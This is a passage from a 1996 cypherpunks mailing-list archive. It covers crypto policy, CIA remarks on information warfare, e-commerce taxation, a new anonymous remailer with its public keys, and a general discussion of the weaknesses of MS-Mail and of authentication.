Sybase, Inc.
Voters Telecommunications Watch
Wired Magazine

Please visit the SAFE Forum Home Page for more information
(http://www.crypto.com/safe/)

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.  To unsubscribe, send a letter to majordomo@panix.com with
"unsubscribe crypto-news" in the body.
-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 29 Jun 1996 10:27:05 +0800
To: cypherpunks@toad.com
Subject: GA law, spam, su etc.
Message-ID: <199606280949.FAA28164@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


So wait... if I'm on a Unix box in Georgia and I use the 'su' 
command, am I breaking the law?

It would seem a 'better' law would outlaw the use of false identitity 
when comitting a crime, as is (supposeldy) the case in certain 
discrete carribbean islands...  which begs the question, since a 
crime is a crime, and using a false id to commit a crime is just 
icing on the cake (and doesn't need to be outlawed anyway).

Rob.


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 29 Jun 1996 10:43:28 +0800
To: cypherpunks@toad.com
Subject: BW: E-commerce
Message-ID: <199606281521.IAA27764@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain



>        (KPMG-PEAT-MARWICK-STUDY) American companies forecast huge growth in
>        electronic commerce, but study uncovers concern about the impact of
>        ambiguous state tax laws 
>        
>           Business Editors
>        
>        NOTE:  The following news release replaces 
>               BW1109, which was upheld by KPMG Peat Marwick.    
>               This revised version is for immediate release.
>        
>            NEW YORK--(BUSINESS WIRE)--June 27, 1996--An overwhelming nine
>        out of ten financial executives at American companies currently
>        engaged in buying and selling goods or services over the Internet
>        caution that government must clarify the associated state and local
>        tax implications if this new method of doing business is to reach
>        its full potential, according to a study conducted on behalf of KPMG
>        Peat Marwick LLP.  
>        
>            "This study shows that electronic commerce is taking off,"  said
>        Kent Johnson, National Partner-in-Charge of KPMG's Sales and
>        Transactions Tax practice.  "But it also reveals the frustrations of
>        corporate America as it tries to cope with the murky environment
>        created by applying old tax laws to new ways of doing business."  
>        
>            Johnson continues: "Taxation of electronic commerce varies from
>        state to state so determining what's taxable and who is responsible
>        for paying those taxes becomes very complex."  
>        
>            Survey respondents appear to agree.  Almost seven out of ten
>        respondents (67%) say that state and local tax laws governing
>        electronic commerce are ambiguous, while more than half of those
>        polled (51%) say that this ambiguity is already inhibiting their
>        involvement in electronic commerce.  Furthermore, 50% say they are
>        "not very"  or "not at all"  familiar with the sales and transaction
>        tax implications -- twice as many as those who say that they are
>        "very"  or "extremely"  familiar with the tax issues.  In fact, 20%
>        of the financial executives surveyed do not know if their companies
>        are even subject to sales and transactions taxes for the sale of
>        products and services over the Internet.  
>        
>            Johnson says that these statistics are particularly distressing
>        because several states and municipalities have already begun taxing
>        certain Internet services.  
>        
>            "The huge growth potential of the Internet has undoubtedly
>        caught the attention of state tax administrators who are eagerly
>        looking for ways to apply existing tax laws and capture some of the
>        revenue this business generates,"  said Michael H.  Lippman,
>        National Partner-in-Charge of KPMG's State and Local Tax Technical
>        Services.  "On the other hand, companies are saying that tax law, in
>        its present form, cannot be applied to the new world of electronic
>        commerce.  They are calling for, at the least, a rewrite of the
>        statutes and many contend that the states should give electronic
>        commerce time to develop before imposing taxes."  
>        
>            Companies' concerns about taxes, however, go beyond those
>        related to the bottom line.  More than half of those surveyed (53 %)
>        think taxing electronic commerce has the potential to become a
>        significant threat to privacy.  Other specific areas of concern
>        include: "the crafting of equitable laws from state to state and
>        across industries" and "fear that state taxing authorities will take
>        a very aggressive approach in determining whether a company is
>        taxable in its state."  
>        
>            Said Johnson of KPMG's Sales and Transaction Tax Practice: "Even
>        though companies are saying they're concerned about the impact of
>        state and local taxes on electronic commerce, very few have been
>        proactive in working with taxing authorities to help ensure
>        equitable rules."  Nearly seven out of 10 companies (68%) say that
>        they are "not very"  or "not at all"  involved with efforts to
>        affect state and local tax policy, compared to only one in 10
>        companies that are "very"  or "extremely involved."  However,
>        exactly half of respondents (50%) claim they do intend to become
>        involved in industry group discussions and debates in the future.  
>        
>            Looking at taxation of electronic commerce from an international
>        perspective, Jeff Stein, National Partner-in-Charge of KPMG's
>        International Services, notes that the impact of ambiguous tax laws
>        on electronic commerce is even more heightened as companies expand
>        their sales and operations overseas.  
>        
>            "Electronic commerce has the potential to fuel the engine for
>        future growth of U.S.  exports,"  notes Stein.  "In fact, 83 percent
>        of study participants believe that electronic commerce will be a
>        major vehicle for U.S.  exports."  
>        
>            About one-third of companies believe that state and local taxes
>        imposed on electronic commerce diminish their international
>        competitiveness.  Indeed, some companies even said that that they
>        would consider moving their Internet activities offshore to escape
>        state and local taxes in the future.  But, KPMG cautions, such a
>        move might not provide the anticipated tax haven because
>        jurisdictions around the world are revenue-starved and will be just
>        as aggressive as individual states in imposing taxes on companies
>        engaged in electronic commerce.  
>        
>            "There are a great deal of unknowns when it comes to electronic
>        versus traditional commerce.  We've been advising our clients to
>        develop a multi-level, flexible approach that positions them for
>        sudden changes in policies.  At the same time we'll continue to work
>        with regulators to help clarify how current tax laws can be fairly
>        applied to business in the 21st century,"  said Lippman.  
>        
>        Editor's note: The KPMG Study was executed by Clark, Martire &
>        Bartolomeo, Inc.  during June 1996.  Results of the study will be
>        available through KPMG's State and Local Tax Practice World Wide Web
>        Site at HTTP:\WWW.US.KPMG.COM\SALT\ or by calling Patricia Neil,
>        KPMG's director of State and Local Tax Marketing & Communications at
>        212/872-6570.  
>        
>        For the purpose of this survey, electronic commerce is defined as
>        buying or selling products or services over the Internet.  The
>        survey was conducted among 291 companies with gross revenues in
>        excess of $50 million.  They span four industry groups: publishing;
>        software/business services/ advertising; communications; and
>        manufacturing/distributing/retail.  
>        
>        KPMG Peat Marwick LLP is the U.S. member firm of KPMG, The Global
>        Leader among professional services firms.  Worldwide, KPMG has more
>        than 6,000 partners as well as 76,000 professionals servicing
>        clients throughout 1,100 offices in 837 cities in 134 countries.  In
>        the U.S., KPMG partners and professionals deliver a wide range of
>        value-added consulting, assurance and tax services in five markets:
>        financial services; manufacturing, retailing and distribution;
>        health care and life sciences; information, communications and
>        entertainment; and public services.  
>        
>        --30--bk/ny*
>        
>        CONTACT:  Pat Neil  
>                  KPMG Peat Marwick LLP         
>                  212/872-5506             
>                  E-mail: pneil@kpmg.com
>                         or
>                  Jackie Kaldon/Constantine Theodoropulos
>                  Shandwick USA
>                  212-420-8100, ext. 213, 217
>                  800-223-2121
>                  E-mail: jkaldon@shandwick.com
>        
>        KEYWORD:  NEW YORK
>        INDUSTRY KEYWORD:  TELECOMMUNICATIONS GOVERNMENT COMED
>        
>         REPEATS: New York 212-752-9600 or 800-221-2462; Boston 617-236-4266
>        or 800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473 BW
>        URL: http://www.businesswire.com
>        
>         
>        
>        Copyright 1996 BusinessWire. All rights reserved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 29 Jun 1996 10:07:55 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: Alternic.net (was domain zapping)
Message-ID: <199606281605.JAA22735@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:42 PM 6/26/96 -0700, jfricker@vertexgroup.com (John F. Fricker) wrote:
>Well, Karl's IETF draft is certainly serious. A Karl is a bit more than a
>kid with a linux box having started one of the largest ISPs in Chicago and
>being a component in the anti CIX fiasco.
>
>I still fail to see why decentralizing control of namespace is a bad idea.

Decentralizing control is a good thing; after all, that's what the 
domain name hierarchy is _for_.  One cost of decentralized control
is the need for coordination between different parts of the namespace.
Another cost is the need to move between namespaces if the
namespace owners either fail or implement policies you dislike.
Having one namespace owner per country plus a couple extra for
non-nationalist namespaces is a convenient approach for accomplishing it,
and worked well when the number of users was small enough that
managing namespaces was a low-volume non-political effort.
That's no longer true.  And as long as the namespace management
is coupled with nameserver administration, which it probably needs to be,
the number of toplevel domains will need to remain small,
and the namespace managers will be motivated to charge money
for names as a way to pay for the nameservers and administration.

Opening up the top-level namespace lets you out of NSI's control, 
if you can coordinate with them and the country-based namespace owners,
but doesn't solve the basic problem.  If you don't do it carefully,
you'll end up needing a bunch of Above-Top-Level nameservers that
serve the names of the tens of thousands of top-level domains.
Karl's draft is an interesting approach; don't know if it'll work.


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Distract Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 29 Jun 1996 10:12:41 +0800
To: cypherpunks@toad.com
Subject: CIA Fears Hackers, Anonymity
Message-ID: <199606281016.KAA03774@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


CIA Director Deutch's comments in the Defense Daily 
article below about hacker surveillance and the national 
security threat of anonymity: 
 
   "Tools are readily available on the Internet, and 
   hackers [computer experts] are a source for any 
   foreign nation or terrorist organization," he said. 
 
   The personal anonymity provided by cyberspace also 
   aids foreign agents, Deutch said, adding that 
   "hackers, with or without their full knowledge, may be 
   supplying advice and expertise to rogue states such as 
   Iran and Libya." 
 
   The CIA and other agencies are working to collect 
   information about hackers and their activities from 
   both informants and from other advanced means, 
   including signals intelligence, Deutch said. The CIA 
   is working closely with the Federal Bureau of 
   Investigations (FBI) and the Department of Justice to 
   collect and analyze information about hackers and 
   their relationships with organized crime and foreign 
   agents, he said. 
 
------ 
 
Defense Daily, 26 June 1996 
 
Deutch Orders Information Warfare Estimate 
 
The nation's top intelligence official said Tuesday that 
he has ordered a major review of foreign threats to the 
U.S. information, banking, and telecommunications 
networks.  
 
"The treat of information warfare and the damage it could 
cause to the U.S. is so significant that it warrants an 
National Intelligence Estimate (NIE)," John Deutch, 
Director of the Central Intelligence Agency (CIA), told 
the Senate Government Affairs committee yesterday. He 
added that disruption of the information infrastructure 
could give terrorists or foreign governments the ability 
to weaken U.S. national security. 
 
"Information attacks could not only disrupt our daily 
lives, but also seriously jeopardize our national or 
economic security," he added. 
 
Deutch said he ordered the NIE to focus attention on how 
vulnerable the nation's computer-based telecommunications 
and information networks are to foreign governments and 
terrorist groups, which are both, despite their relative 
differences in personnel and funding, potential threats 
to U.S. information networks. 
Information warfare is neither manpower intensive nor an 
expensive form of terrorism, Deutch said, adding that 
even the smallest radical group can exploit the 
unregulated and undefended expanse of cyberspace. 
 
For example, the Islamic militant group Hezboullah has 
been using the Internet and other modern means of 
communications for their daily operations, Deutch said. 
Such technology could also be used to launch a terrorist 
act on the U.S., he added. 
  
This NIE will determine the damage terrorists or foreign 
governments could inflict were they to combine 
information warfare techniques with conventional military 
tactics to attack the U.S. 
 
An NIE, which details potential security threats to the 
U.S., is usually crafted by the National Intelligence 
Council (NIC), a senior panel of career intelligence 
officers and academics. This NIE, however, will also 
include comments from the U.S. law enforcement community, 
the Defense Information Security Agency, the armed 
services, and representatives from the major 
telecommunications providers, Deutch said. 
 
The threat estimate is expected to be complete by 
December 1, 1996, he added. 
 
Preliminary evaluations conducted by the U.S. 
intelligence community suggest that such a coordinated 
information attack could seriously disrupt electric power 
grids, air traffic control centers, banks and the stock 
market, or even the operational effectiveness of deployed 
U.S. military forces. Deutch is concerned about the ease 
with which enemy agents can obtain the hardware and 
software required to attack the information 
infrastructure. 
 
"Tools are readily available on the Internet, and hackers 
[computer experts] are a source for any foreign nation or 
terrorist organization," he said. 
 
The personal anonymity provided by cyberspace also aids 
foreign agents, Deutch said, adding that "hackers, with 
or without their full knowledge, may be supplying advice 
and expertise to rogue states such as Iran and Libya." 
 
In addition to the high technology, computer-based threat 
to the U.S. information infrastructure, foreign agents 
could use conventional explosives to destroy key 
information facilities and data processing centers. 
 
Previous studies conducted by the U.S. intelligence 
community suggests that numerous foreign nations are 
creating "cyber-warfare" techniques for application on 
the modern battlefield, Deutch said. Those programs are 
geared towards crippling an enemy's command and control 
centers or disabling air defense networks, he added. 
 
Based upon the progress made by these military programs, 
disrupting U.S. civilian and commercial information 
networks would be easy, Deutch said. 
 
The U.S. intelligence community has begun several 
activities in response to the emerging cyber-threat, he 
said. 
 
The CIA and other agencies are working to collect 
information about hackers and their activities from both 
informants and from other advanced means, including 
signals intelligence, Deutch said. The CIA is working 
closely with the Federal Bureau of Investigations (FBI) 
and the Department of Justice to collect and analyze 
information about hackers and their relationships with 
organized crime and foreign agents, he said. 
 
Both the intelligence and law enforcement communities are 
trying to work with private industry and academia in this 
cyber-warfare campaign, he said. 
 
The Pentagon and the CIA may reorganize existing 
personnel and efforts to create a new information warfare 
center at the National Security Agency, he added. 
 
----- 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Sat, 29 Jun 1996 09:56:56 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <199606281551.KAA00586@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes about the miserable state of
computer security, and I'll comment on some statements, hopefully
taken not too far out of order and context:

>I think that backward compatibility requirements are a significant part of
>the reason we see this problem.  The other part is, of course, that there
>is no market for security.

The phrase "backward compatibility" is, in my experience, a code
phrase for peoples' annoying habit of wanting to stay with things
they've finally made useful as opposed to having them replaced by
something "better" that is more expensive, less convenient, and in
general less familiar. The components of the latest release of MS
Office come to mind as a good example, and they didn't even include
public key crypto to atone for it.

I agree that it's seductive for us security weenies to think the tail
wags the dog, but let's remember what's really supposed to be happening.

The requirement isn't "backwards compatibility," the requirement is
that people get their work done. If the security threat keeps them
from getting their work done, then backwards compatibility is no
longer a major requirement.

>The problem, in general, isn't the system administrators.  If management
>gave the same priority to security that it does to joining new users or
>installing new hardware, sysadmins would have the time to install the
>patches.  Most sysadmins are up to their asses in alligators.  Security is
>something to put off.  If the managers were judged on the security of their
>systems (perhaps via independent audit), then they might give the problem
>some priority.

The problem (or at least the difference) is in the priorities
established by an organization's culture. Some would rather take the
risks and do things in a fairly open, if unpredictable, environment.
Some prefer and even thrive on predictability. Either approach can and
does produce valuable results. However, few people want to use a bank
that takes the "open, if unpredicable" approach. Banks have auditors.

>The ideal situation for them would be to use public key authentication
>because it would be entirely user-transparent. ...

Nonsense. The mere fact that it's not currently deployed guarantees
that it won't be user transparent. Vendors will include it on some
rewrite of whatever software it's embedded in. Memory requirements go
up and delays are introduced when the crypto computations are
performed. Security will be added only if it gives customers more
things they can do, so there'll be other functional changes as well.

In any case, working crypto *can't* be entirely user transparent.
People need to handle keys, choose the one to use, and update them
occasionally. There is a lot of training and cultural awareness
involved here that just doesn't exist yet.

And there will be *billions* in fraud before people finally learn,
then maybe it'll attenuate to mere millions (and I'm probably still
optimistic by orders of magnitude).  Look at credit and ATM cards. A
dozen years ago a bank issued us some ATM cards, and the clerk
insisted on writing the PIN code ON the cards. Very few banks do that
any more.

Rick.
smith@sctc.com            secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 29 Jun 1996 11:14:14 +0800
To: cypherpunks@toad.com
Subject: Another free speech victory
Message-ID: <199606281805.LAA22574@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Just read that the Supreme Court "struck down provisions of the 1992
Cable Act that require local cable companies to either ban indecent
shows from appearing on leased or access channels or place all
programs deemed indecent on a single channel and block it. Those
provisions violate free-speech rights, the court said. But the court
said Congress lawfully can permit cable operators to choose not to
broadcast such programs on leased access channels." [NYT]

Looks like the gov't will lose if it decides to appeal the CDA
decision.

Medea







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 29 Jun 1996 09:57:54 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Ga Law/No False Identity
Message-ID: <2.2.32.19960628182607.00ad9fc8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 PM 6/27/96 -0400, AwakenToMe@aol.com wrote:

>falsely id a person?? Well it seems to me ya just wanna get the messages
>OUTTA there and arent trying to 'act' as that person in the sense that you
>are posing to NO person that you really are that person.

I just wonder how the law is going to effect all those web servers posing as
nobody (uid #-1).

"When SUID is outlawed, only outlaws will become sysadmins."
---
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Sat, 29 Jun 1996 09:52:09 +0800
To: raph@cs.berkeley.edu
Subject: New mix/ghio.remailer.2 remailer up: jam
Message-ID: <199606281906.MAA29266@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As anticipated, I've put up a ghio.remailer.2.  The email address is
<remailer@cypherpunks.ca>.

Here's the public key:

Type bits/keyID    Date       User ID
pub  1024/734C3A3D 1996/06/28 John Anonymous MacDonald Remailer <remailer@cypherpunks.ca>
sig       734C3A3D             John Anonymous MacDonald Remailer <remailer@cypherpunks.ca>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzHUH7sAAAEEAKi9dAsHtUYzWu8u/0O3HKfWMYYfuwlo9y5W1x+lvNdZ9RL0
T1znvGaaoGmVF76qzl3aAabuoiKTdeGyUtZ5kZ/Ka+DpMaRQUaTY7i4wf3vD8u1I
y2mTGYv945BwBdhcpDeTVCK81J6krnY1iAi6o8GqtATQHeJskDz5wkNzTDo9AAUR
tDtKb2huIEFub255bW91cyBNYWNEb25hbGQgUmVtYWlsZXIgPHJlbWFpbGVyQGN5
cGhlcnB1bmtzLmNhPokAlQMFEDHUH+c8+cJDc0w6PQEBIC0D/jMBXNlMBSokNveZ
7LvWpWKfOlHwNSNGT3p403o21bIG9txsPk9e/wDurG310hJglKBuovoenqwClxy/
m6lldAe+11VMpLimzUCE0W4LeJxW84N+Jg/SGmP7YF1N0OmAc0snfvJhhgI0kWHl
DMu+pWAc6UXLEPln0wtb936TFxbA
=WL1j
- -----END PGP PUBLIC KEY BLOCK-----

It also accepts Mixmaster messages:

jam remailer@cypherpunks.ca c2178bf3018c062a8d0fabd066e50ed9 2.0.3

- -----Begin Mix Key-----
c2178bf3018c062a8d0fabd066e50ed9
258
AATgExB26IdURw+itvFEQsWjv/mQFgg3Tu2avLU2
fdW55aqKqKDeiIWf8nY24HG+i08s65cp8zCm2w7E
ZvzgcBxLQu91Sg1UbQlkYMYqx8NpeKjxnkU+5KqC
mswqrAbOn0qqcmNz7/3TsGS0p22+Dsw9rLjwDk4o
udzR2maCUTuDvwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

Note that the above mix line should be used instead of the one
(called "jammix") I posted yesterday.

For Raph's remailers file:

$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdQs3UZRiTErSPb1AQHC9gP+KT5KfwsHdK6S7Urg2iVxbLAqci5+gZhi
E6UKqsolDv8BMCr5nJuMClEHfdJBGrGeyrazgcxESmOzAoj/TfHbIU6seg46/q9c
pSpASazX39YE8Os5hMomgcEfFBVFE8+m9XUWGNnpCvyO8ZtlfVyQS+vG0aS2o0hE
/59pTd0iTAM=
=J5Hd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 29 Jun 1996 10:06:05 +0800
To: Rick Smith <cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <199606281920.MAA12136@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 AM 6/28/96 -0500, Rick Smith wrote:
>frantz@netcom.com (Bill Frantz) writes:
>>I think that backward compatibility requirements are a significant part of
>>the reason we see this problem.  The other part is, of course, that there
>>is no market for security.
>
>...
>
>The requirement isn't "backwards compatibility," the requirement is
>that people get their work done. If the security threat keeps them
>from getting their work done, then backwards compatibility is no
>longer a major requirement.

Absolutely.  However, from a vendor's point of view, customers have a wide
range of security problems.  Some run in an open environment and have no
use for security.  They may still be using those VT100s.  These are the
customers the vendor considers when thinking of backwards compatibility.


>>The ideal situation for them would be to use public key authentication
>>because it would be entirely user-transparent. ...
>
>Nonsense. The mere fact that it's not currently deployed guarantees
>that it won't be user transparent. Vendors will include it on some
>rewrite of whatever software it's embedded in. Memory requirements go
>up and delays are introduced when the crypto computations are
>performed. Security will be added only if it gives customers more
>things they can do, so there'll be other functional changes as well.

There are several "users" at issue.  I fully agree that those
administrators responsible for upgrading the software and hardware for the
change will notice.  The people who have to pay for it all should also
notice.  But the actual end user may find the logon simplified.  If is
sufficent to mearly identify the machine and not the person, then the new
software can eliminate end user involvement in the logon.  The
administrator is responsible for installing the private key in the machine
and the end user never sees it.

On the other hand, if users still must be identified, it is possible to
give them a logon interface which is unchanged from the old,
non-one-time-password, interface, while still giving them the benefits.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Sat, 29 Jun 1996 10:10:20 +0800
To: cypherpunks@toad.com
Subject: News: NEC has encrypted networks ...
Message-ID: <199606281930.MAA00143@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Japanese companies catching up and passing American companies
should scare those Congressional critters into action:

Ern

--------

06/27/96 VIRTUAL PRIVATE NETWORKING ADVANCES

PAGE: 1C 

NEC Technologies' Internet Business Unit has successfully demonstrated
country-to-country virtual private networking during several tests
performed in early June between the San Jose unit and its counterpart
in Tokyo. Virtual private networking promises a secure and
cost-effective alternative to privately leased lines. Most connections
across the Internet are not encrypted and information exchanged is
vulnerable to snoopers. In a virtual private network, encryption is
used to scramble the data.

(From SJ Mercury NewsLibrary)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Sat, 29 Jun 1996 10:12:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606281309.PAA13151@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I would appreciate any information members may have regarding the security/safety of the new nym server nym.alias.net (in "alpha" state) who posted here about 3 weeks ago. Nym.alias.net reportedly is the same machine as anon.lcs.mit.edu.

Specifically, is the individual running the nym _known_ to cypherpunks, or is this an unknown about whom I should have serious doubts. The admin states that nym.alias.net is the same machine as anon.lcs.mit.edu. 

Any information or insight regarding the wisdom of using ths nym would be welcome.

Information concerning the nym I obtained by sending a message to help@nym.alias.net; the administrator can be reached at admin@nym.alias.net. 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 29 Jun 1996 10:14:11 +0800
To: cypherpunks@toad.com
Subject: UK Crypto regs?
Message-ID: <Pine.SUN.3.91.960628170810.25672C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anybody got a trip report for the IEE meeting yesterday? I phoned the 
IEE press office, but no-one there seemed to have any briefings, and 
there didn't seem to be any coverage

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nson@kpmg.com
Date: Sat, 29 Jun 1996 09:46:32 +0800
To: cypherpunks@toad.com
Subject: FTS2000 and Encryption?
Message-ID: <9605288360.AA836007879@mailgate5.kpmg.com>
MIME-Version: 1.0
Content-Type: text/plain


I trying to find out if there are any talks, decisions or even standards being 
discussed for encryption and FTS2000?

Anything will be helpful.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Sat, 29 Jun 1996 10:03:29 +0800
To: harka@nycmetro.com
Subject: Re: MS-Mail Security
In-Reply-To: <TCPSMTP.16.6.27.-15.0.46.2780269260.1184837@nycmetro.com>
Message-ID: <Pine.SCO.3.93.960628171056.19646C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jun 1996 harka@nycmetro.com wrote:

>  In> I would like to gather informations of whether the MS-Mail server
>  In> is  secure or not, is anyone heard of somebody, say, disguise as other
>  In> user  or read other user e-mail?
> 
> I'd also like to know how secure the MS-Mail files are (*.mmf). They are
> password protected and should be encrypted but does anybody know how
> secure? 

We have worked extensively with MS Mail and providing integrated crypto
features for the product.  The native security on the files is provided in
two ways:  1)  The usually poor MS "scrambling" (it's not really crypto),
and 2) The discretionary access controls (DAC) of the OS.  Since only NT
has decent DAC (which only works at a C2 level of trust when it's not on a
network), my opinion of the risk level would be "VERY HIGH" against
threats of repudiation, loss of confidentiality, loss of availability, and
loss of integrity. 

Further, the I&A mechanisms in everything other than a stand-alone NT
environment are inadequate for any real proof of identity.  They most
certainly can't offer anything close to a real non-repudiation solution.
Forging a "from" header into the database is, I would contend, fairly
simple.  Reading someone else's mail is a bit harder, but not incredibly
difficult.  If traditional hacking doesn't work, building a hacking tool
using MAPI (widely available API to the mail subsystem) would be fairly
straight-forward (Hmmmmm - Summer vacation programming project???). 

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|Protects  - Federal Judges on the CDA    |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 29 Jun 1996 10:00:11 +0800
To: cypherpunks@toad.com
Subject: Yet another mailing list
Message-ID: <9606282223.AA29739@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



For those of you who are privacy-cypherpunks - there is
another list (run by big-brother) out there on the issue.

>From the list-of-lists:

PRIVACY
  Subscription Address: PRIVACY-REQUEST@FTC.GOV
  Owner: John Audette <ja@mmgco.com>
  Last Update: 12/28/95
  Description:
   A mailing list created bt the US Federal Trade Commission to allow
   interested parties to discuss the issues surrounding the privacy
   interests of consumers visiting web sites.  It is part of the FTC's
   "Privacy Initiative" to investigate whether the information
   collected at websites (either that affirmatively submitted by a
   visitor via a form or information collected based upon a visitor's
   selection of pages at a site to reflect personal interests) should
   be the subject of regulation by the FTC.


------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 29 Jun 1996 12:00:59 +0800
To: cypherpunks@toad.com
Subject: Re: Another free speech victory
Message-ID: <199606290107.SAA03962@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 AM 6/28/96 -0700, Anonymous User wrote:
>Just read that the Supreme Court "struck down provisions of the 1992
>Cable Act that require local cable companies to either ban indecent
>shows from appearing on leased or access channels or place all
>programs deemed indecent on a single channel and block it. Those
>provisions violate free-speech rights, the court said. But the court
>said Congress lawfully can permit cable operators to choose not to
>broadcast such programs on leased access channels." [NYT]
>
>Looks like the gov't will lose if it decides to appeal the CDA
>decision.
>Medea

However, it's worrisome that the decisions were only 6-3 and 5-4.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Sat, 29 Jun 1996 10:43:26 +0800
To: cypherpunks@toad.com
Subject: Policy Post 2.26 - Sen. Crypto Hearing; SAFE Forum Cybercast; CDT on C-SPAN; more
Message-ID: <v02140b0badfa1607e035@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
